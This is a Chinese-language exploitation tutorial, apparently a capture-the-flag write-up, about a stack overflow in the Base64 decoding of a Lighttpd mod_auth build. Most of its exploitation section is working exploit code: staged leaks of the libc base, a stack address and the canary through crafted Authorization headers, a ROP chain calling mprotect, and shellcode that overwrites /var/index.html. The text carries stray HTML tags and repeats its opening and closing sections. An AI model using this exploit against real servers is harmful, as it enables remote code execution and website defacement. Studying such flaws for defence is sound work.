Lighttpd 栈溢出漏洞分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2>
本漏洞存在于 Lighttpd 的 mod_auth.so 模块中，具体在 `li_base64_dec<\/code> 函数的 Base64 解码过程中存在栈溢出漏洞。攻击者可以通过精心构造的 Authorization 头部触发该漏洞，进而实现远程代码执行。<\/p>`

2. 环境配置<\/h2>
2.1 服务启动<\/h3>
Lighttpd 服务默认监听在 8080 端口，可通过以下命令启动：<\/p>
\/home\/qwb\/lighttpd -f \/home\/qwb\/lighttpd.conf
<\/span><\/span><\/code><\/pre>如果遇到端口冲突错误：<\/p>
bind() 0.0.0.0:8080: Address already in use
<\/code><\/pre>
3. 漏洞分析<\/h2>
3.1 漏洞位置<\/h3>
漏洞位于 mod_auth.so 模块的 sub_4989<\/code> 函数中，具体在 Base64 解码部分：<\/p>
na =<\/span> li_base64_dec(s, 1024LL<\/span>, *<\/span>v16 +<\/span> 6LL<\/span>, n, 0LL<\/span>); \/\/ 栈溢出
<\/span><\/span><\/span><\/code><\/pre>3.2 漏洞函数分析<\/h3>
li_base64_dec<\/code> 函数存在以下关键问题：<\/p>
__int64<\/span> __fastcall<\/span> li_base64_dec<\/span>(__int64<\/span> a1, __int64<\/span> a2, char<\/span> *<\/span>a3, __int64<\/span> a4, int<\/span> a5) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    while<\/span> (v12 <<\/span> v17) {
<\/span><\/span>        if<\/span> (*<\/span>v12 <<\/span> 0<\/span>)
<\/span><\/span>            v6 =<\/span> -<\/span>1LL<\/span>;
<\/span><\/span>        else<\/span>
<\/span><\/span>            v6 =<\/span> v18[*<\/span>v12];
<\/span><\/span>        v13 =<\/span> v6;
<\/span><\/span>        if<\/span> (v6 >=<\/span> 0<\/span>) {
<\/span><\/span>            v14 =<\/span> v6 |<\/span> (v14 <<<\/span> 6<\/span>);
<\/span><\/span>            \/\/ 关键漏洞点：没有检查输出缓冲区边界
<\/span><\/span><\/span><\/span>            if<\/span> ((++<\/span>v15 &<\/span> 3<\/span>) ==<\/span> 0<\/span>) {
<\/span><\/span>                *<\/span>(a1 +<\/span> v16) =<\/span> BYTE2(v14);
<\/span><\/span>                *<\/span>(a1 +<\/span> v16 +<\/span> 1<\/span>) =<\/span> BYTE1(v14);
<\/span><\/span>                v7 =<\/span> v16 +<\/span> 2<\/span>;
<\/span><\/span>                v16 +=<\/span> 3LL<\/span>;
<\/span><\/span>                *<\/span>(a1 +<\/span> v7) =<\/span> v14;
<\/span><\/span>                v14 =<\/span> 0LL<\/span>;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>主要问题：<\/p>

缺少对输入参数的有效性检查<\/li>
没有验证输出缓冲区边界<\/li>
允许任意长度的 Base64 输入导致栈溢出<\/li>
<\/ol>
3.3 信息泄露机制<\/h3>
当 Base64 解码后的账号密码中不存在冒号 :<\/code> 时，会进入 sub_4720<\/code> 函数，该函数可以泄露内存信息：<\/p>
v21 =<\/span> (char<\/span> *<\/span>)memchr(s, ':'<\/span>, na);
<\/span><\/span>if<\/span> (!<\/span>v21) {
<\/span><\/span>    s[na -<\/span> 1<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>    log_error(...);
<\/span><\/span>    return<\/span> sub_4720<\/span>(a1, *<\/span>(_QWORD *<\/span>)(a3 +<\/span> 8<\/span>), (const<\/span> char<\/span> *<\/span>)dest); \/\/ 信息泄露
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 漏洞利用<\/h2>
4.1 利用步骤<\/h3>

泄露 libc 基地址<\/strong><\/li>
泄露栈地址<\/strong><\/li>
泄露 Canary 值<\/strong><\/li>
构造 ROP 链<\/strong><\/li>
执行 shellcode<\/strong><\/li>
<\/ol>
4.2 详细利用过程<\/h3>
4.2.1 泄露 libc 基地址<\/h4>
with<\/span> remote(target_ip, 8080<\/span>) as<\/span> connection:
<\/span><\/span>    payload =<\/span> (
<\/span><\/span>        b<\/span>'GET \/www\/ HTTP\/1.1<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>        b<\/span>'Host: www.xmcve.com<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>        b<\/span>'Authorization: Basic '<\/span> +<\/span> base64.<\/span>b64encode(b<\/span>'a'<\/span> *<\/span> 0x68<\/span>) +<\/span> b<\/span>'<\/span>\r\n\r\n<\/span>'<\/span>
<\/span><\/span>    )
<\/span><\/span>    send_line(connection, payload)
<\/span><\/span>    
<\/span><\/span>    for<\/span> _ in<\/span> range(2<\/span>):
<\/span><\/span>        receive_until(connection, b<\/span>'a'<\/span> *<\/span> 0x68<\/span>)
<\/span><\/span>        libc_base =<\/span> read_64_bits(connection) -<\/span> 0xe1225<\/span>
<\/span><\/span>        receive_data(connection)
<\/span><\/span><\/code><\/pre>4.2.2 泄露栈地址<\/h4>
payload =<\/span> (
<\/span><\/span>    b<\/span>'GET \/www\/ HTTP\/1.1<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>    b<\/span>'Host: www.xmcve.com<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>    b<\/span>'Authorization: Basic '<\/span> +<\/span> base64.<\/span>b64encode(b<\/span>'c'<\/span> *<\/span> 0x80<\/span>) +<\/span> b<\/span>'<\/span>\r\n\r\n<\/span>'<\/span>
<\/span><\/span>)
<\/span><\/span>send_line(connection, payload)
<\/span><\/span>receive_until(connection, b<\/span>'c'<\/span> *<\/span> 0x80<\/span>)
<\/span><\/span>leaked_stack =<\/span> read_64_bits(connection)
<\/span><\/span><\/code><\/pre>4.2.3 泄露 Canary 值<\/h4>
payload =<\/span> (
<\/span><\/span>    b<\/span>'GET \/www\/ HTTP\/1.1<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>    b<\/span>'Host: www.xmcve.com<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>    b<\/span>'Authorization: Basic '<\/span> +<\/span> base64.<\/span>b64encode(b<\/span>'b'<\/span> *<\/span> 0xe9<\/span>) +<\/span> b<\/span>'<\/span>\r\n\r\n<\/span>'<\/span>
<\/span><\/span>)
<\/span><\/span>send_line(connection, payload)
<\/span><\/span>receive_until(connection, b<\/span>'b'<\/span> *<\/span> 0xe9<\/span>)
<\/span><\/span>canary_value =<\/span> u64(connection.<\/span>recv(7<\/span>).<\/span>rjust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>))
<\/span><\/span><\/code><\/pre>4.2.4 构造 ROP 链<\/h4>
# 计算关键地址<\/span>
<\/span><\/span>system_addr, bin_sh_addr =<\/span> find_system_and_binsh(libc_base, remote_library)
<\/span><\/span>ret_addr =<\/span> libc_base +<\/span> 0x0000000000029139<\/span>
<\/span><\/span>rdi_gadget =<\/span> libc_base +<\/span> 0x000000000002a3e5<\/span>
<\/span><\/span>rsi_gadget =<\/span> libc_base +<\/span> 0x000000000002be51<\/span>
<\/span><\/span>rdx_r12_gadget =<\/span> libc_base +<\/span> 0x000000000011f2e7<\/span>
<\/span><\/span>rax_gadget =<\/span> libc_base +<\/span> 0x0000000000045eb0<\/span>
<\/span><\/span>syscall_gadget =<\/span> libc_base +<\/span> 0x0000000000029db4<\/span>
<\/span><\/span>read_function =<\/span> libc_base +<\/span> remote_library.<\/span>sym['read'<\/span>]
<\/span><\/span>mprotect_function =<\/span> libc_base +<\/span> remote_library.<\/span>sym['mprotect'<\/span>]
<\/span><\/span>
<\/span><\/span># 构造 shellcode<\/span>
<\/span><\/span>html_content =<\/span> (
<\/span><\/span>    b<\/span>'<\/span>\n<\/span><html><\/span>\n<\/span><head><\/span>\n<\/span> <title>test!<\/title><\/span>\n<\/span><\/head><\/span>\n<\/span><body><\/span>\n<\/span>'<\/span>
<\/span><\/span>    b<\/span>' <h1>Test!!!!!!<\/h1><\/span>\n<\/span> <p>Hacked by Test.<\/p><\/span>\n<\/span><\/body><\/span>\n<\/span><\/html><\/span>\x00<\/span>'<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>shellcode =<\/span> asm(
<\/span><\/span>    shellcraft.<\/span>open('\/var\/index.html'<\/span>, 'O_RDWR'<\/span>) +<\/span>
<\/span><\/span>    'mov r15, rax'<\/span> +<\/span>
<\/span><\/span>    shellcraft.<\/span>write('rax'<\/span>, leaked_stack +<\/span> 0x1d0<\/span>, 0x100<\/span>) +<\/span>
<\/span><\/span>    shellcraft.<\/span>close('r15'<\/span>)
<\/span><\/span>).<\/span>ljust(0x100<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> html_content
<\/span><\/span>
<\/span><\/span># 构造完整ROP链<\/span>
<\/span><\/span>rop_chain =<\/span> (
<\/span><\/span>    b<\/span>'a'<\/span> *<\/span> 0x408<\/span> +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, canary_value) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, 0<\/span>) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, rdi_gadget) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, leaked_stack >><\/span> 12<\/span> <<<\/span> 12<\/span>) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, rsi_gadget) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, 0x2000<\/span>) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, rdx_r12_gadget) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, 0x7<\/span>) *<\/span> 2<\/span> +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, mprotect_function) +<\/span>
<\/span><\/span>    pack('<Q'<\/span>, leaked_stack +<\/span> 0xd0<\/span>) +<\/span>
<\/span><\/span>    shellcode
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>4.2.5 发送最终payload<\/h4>
final_payload =<\/span> (
<\/span><\/span>    b<\/span>'GET \/www\/ HTTP\/1.1<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>    b<\/span>'Host: www.test.com<\/span>\r\n<\/span>'<\/span>
<\/span><\/span>    b<\/span>'Authorization: Basic '<\/span> +<\/span> base64.<\/span>b64encode(rop_chain) +<\/span> b<\/span>'<\/span>\r\n\r\n<\/span>'<\/span>
<\/span><\/span>)
<\/span><\/span>send_line(connection, final_payload)
<\/span><\/span><\/code><\/pre>5. 关键点总结<\/h2>

漏洞触发点<\/strong>：通过超长的Base64编码的Authorization头部触发栈溢出<\/li>
信息泄露<\/strong>：利用缺少冒号的Base64字符串触发sub_4720函数泄露内存<\/li>
利用链构造<\/strong>：

分阶段泄露libc基地址、栈地址和Canary值<\/li>
使用ROP链绕过保护机制<\/li>
调用mprotect修改内存权限后执行shellcode<\/li>
<\/ul>
<\/li>
利用效果<\/strong>：修改\/var\/index.html文件内容<\/li>
<\/ol>
6. 防御建议<\/h2>

在li_base64_dec<\/code>函数中添加输入长度检查<\/li>
验证输出缓冲区边界<\/li>
对Base64解码后的数据进行严格格式验证<\/li>
更新到最新版本的Lighttpd<\/li>
<\/ol>
7. 完整EXP<\/h2>
完整利用代码已在原文中提供，包含所有必要的功能函数和利用步骤。关键点在于分阶段泄露内存信息并精心构造ROP链实现任意代码执行。<\/p>

Lighttpd 栈溢出漏洞分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2> 本漏洞存在于 Lighttpd 的 mod_auth.so 模块中，具体在 li_base64_dec<\/code> 函数的 Base64 解码过程中存在栈溢出漏洞。攻击者可以通过精心构造的 Authorization 头部触发该漏洞，进而实现远程代码执行。<\/p>

3. 漏洞分析<\/h2>

4. 漏洞利用<\/h2>

4.2 详细利用过程<\/h3>

7. 完整EXP<\/h2> 完整利用代码已在原文中提供，包含所有必要的功能函数和利用步骤。关键点在于分阶段泄露内存信息并精心构造ROP链实现任意代码执行。<\/p>

1. 漏洞概述<\/h2>
本漏洞存在于 Lighttpd 的 mod_auth.so 模块中，具体在 `li_base64_dec<\/code> 函数的 Base64 解码过程中存在栈溢出漏洞。攻击者可以通过精心构造的 Authorization 头部触发该漏洞，进而实现远程代码执行。<\/p>`

7. 完整EXP<\/h2>
完整利用代码已在原文中提供，包含所有必要的功能函数和利用步骤。关键点在于分阶段泄露内存信息并精心构造ROP链实现任意代码执行。<\/p>